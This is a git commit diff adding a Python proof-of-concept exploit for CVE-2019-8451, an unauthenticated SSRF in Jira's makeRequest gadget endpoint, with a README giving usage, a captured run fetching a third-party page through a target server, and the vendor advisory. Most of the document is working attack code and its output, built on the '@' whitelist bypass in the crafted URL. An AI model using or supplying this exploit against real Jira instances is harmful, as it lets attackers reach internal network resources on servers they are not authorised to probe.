add CVE-2019-8451

2025-06-20 18:00:35 +00:00 · 2019-09-26 19:53:58 +08:00 · 2019-09-26 19:53:58 +08:00 · 43e577f84e
commit 43e577f84e
parent fddedfc700
5 changed files with 89 additions and 0 deletions
--- a/CVE-2019-8451/CVE-2019-8451.jpg
+++ b/CVE-2019-8451/CVE-2019-8451.jpg
--- a/CVE-2019-8451/CVE-2019-8451.py
+++ b/CVE-2019-8451/CVE-2019-8451.py
@ -0,0 +1,41 @@
+import requests
+
+import sys
+
+# http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com/
+
+def ssrf_poc(url, ssrf_url):
+    if url[-1] == '/':
+        url = url[:-1]
+    else:
+        url = url
+
+    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url
+
+    headers = {
+    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
+    "Accept": "*/*",
+    "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
+    "Accept-Encoding": "gzip, deflate",
+    "X-Atlassian-Token": "no-check",
+    "Connection": "close"
+    }
+
+    r = requests.get(url=vuln_url, headers=headers)
+    if r.status_code == 200 and 'set-cookie' in r.content:
+        print "\n>>>>Send poc Success!\n"
+        print 'X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME')
+        print "\n>>>>vuln_url= " + vuln_url + '\n'
+        print r.content
+    else:
+        print "No Vuln Exit!"
+
+
+if __name__ == "__main__":
+    
+    while True:
+        print
+        ssrf_url = raw_input(">>>>SSRF URL: ")
+        url = "http://www.jas502n.com:8080"
+        ssrf_poc(url, ssrf_url)
+
--- a/CVE-2019-8451/JRASERVER-69793.jpg
+++ b/CVE-2019-8451/JRASERVER-69793.jpg
--- a/CVE-2019-8451/README.md
+++ b/CVE-2019-8451/README.md
@ -0,0 +1,48 @@
+# CVE-2019-8451 Jira未授权SSRF漏洞
+
+## python usage
+
+`python CVE-2019-8451.py  http://www.jas502n.com:8080`
+
+![](./CVE-2019-8451.jpg)
+
+```
+root@kali:~/CVE-2019-8451# python CVE-2019-8451.py  http://www.jas502n.com:8080
+
+>>>>SSRF URL: www.baidu.com
+
+>>>>Send poc Success!
+
+X-AUSERNAME= anonymous
+
+>>>>vuln_url= http://www.jas502n.com:8080/plugins/servlet/gadgets/makeRequest?url=http://www.jas502n.com:8080@www.baidu.com
+
+throw 1; < don't be evil' >{"http://www.jas502n.com:8080@www.baidu.com":{"rc":200,"headers":{"set-cookie":["BDORZ=27315; max-age=86400; domain=.baidu.com; path=/"]},"body":"<!DOCTYPE html>\r\n<!--STATUS OK--><html> <head><meta http-equiv=content-type content=text/html;charset=utf-8><meta http-equiv=X-UA-Compatible content=IE=Edge><meta content=always name=referrer><link rel=stylesheet type=text/css href=http://s1.bdstatic.com/r/www/cache/bdorz/baidu.min.css><title>百度一下，你就知道<\/title><\/head> <body link=#0000cc> <div id=wrapper> <div id=head> <div class=head_wrapper> <div class=s_form> <div class=s_form_wrapper> <div id=lg> <img hidefocus=true src=//www.baidu.com/img/bd_logo1.png width=270 height=129> <\/div> <form id=form name=f action=//www.baidu.com/s class=fm> <input type=hidden name=bdorz_come value=1> <input type=hidden name=ie value=utf-8> <input type=hidden name=f value=8> <input type=hidden name=rsv_bp value=1> <input type=hidden name=rsv_idx value=1> <input type=hidden name=tn value=baidu><span class=\"bg s_ipt_wr\"><input id=kw name=wd class=s_ipt value maxlength=255 autocomplete=off autofocus><\/span><span class=\"bg s_btn_wr\"><input type=submit id=su value=百度一下 class=\"bg s_btn\"><\/span> <\/form> <\/div> <\/div> <div id=u1> <a href=http://news.baidu.com name=tj_trnews class=mnav>新闻<\/a> <a href=http://www.hao123.com name=tj_trhao123 class=mnav>hao123<\/a> <a href=http://map.baidu.com name=tj_trmap class=mnav>地图<\/a> <a href=http://v.baidu.com name=tj_trvideo class=mnav>视频<\/a> <a href=http://tieba.baidu.com name=tj_trtieba class=mnav>贴吧<\/a> <noscript> <a href=http://www.baidu.com/bdorz/login.gif?login&amp;tpl=mn&amp;u=http%3A%2F%2Fwww.baidu.com%2f%3fbdorz_come%3d1 name=tj_login class=lb>登录<\/a> <\/noscript> <script>document.write('<a href=\"http://www.baidu.com/bdorz/login.gif?login&tpl=mn&u='+ encodeURIComponent(window.location.href+ (window.location.search === \"\" ? \"?\" : \"&\")+ \"bdorz_come=1\")+ '\" name=\"tj_login\" class=\"lb\">登录<\/a>');<\/script> <a href=//www.baidu.com/more/ name=tj_briicon class=bri style=\"display: block;\">更多产品<\/a> <\/div> <\/div> <\/div> <div id=ftCon> <div id=ftConw> <p id=lh> <a href=http://home.baidu.com>关于百度<\/a> <a href=http://ir.baidu.com>About Baidu<\/a> <\/p> <p id=cp>&copy;2017&nbsp;Baidu&nbsp;<a href=http://www.baidu.com/duty/>使用百度前必读<\/a>&nbsp; <a href=http://jianyi.baidu.com/ class=cp-feedback>意见反馈<\/a>&nbsp;京ICP证030173号&nbsp; <img src=//www.baidu.com/img/gs.gif> <\/p> <\/div> <\/div> <\/div> <\/body> <\/html>\r\n"}}
+
+>>>>SSRF URL:
+```
+
+
+![](./burpsuite.jpg)
+
+## 0x01 SSRF in the /plugins/servlet/gadgets/makeRequest resource - CVE-2019-8451
+
+
+```
+The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.
+
+Fixed in Version/s: 8.4.0
+
+```
+
+![](./JRASERVER-69793.jpg)
+
+## 参考链接
+
+https://mp.weixin.qq.com/s/_Tsq9p1pQyszJt2VaXd61A
+
+https://jira.atlassian.com/browse/JRASERVER-69793
+
+## 来源
+
+https://github.com/jas502n/CVE-2019-8451
--- a/CVE-2019-8451/burpsuite.jpg
+++ b/CVE-2019-8451/burpsuite.jpg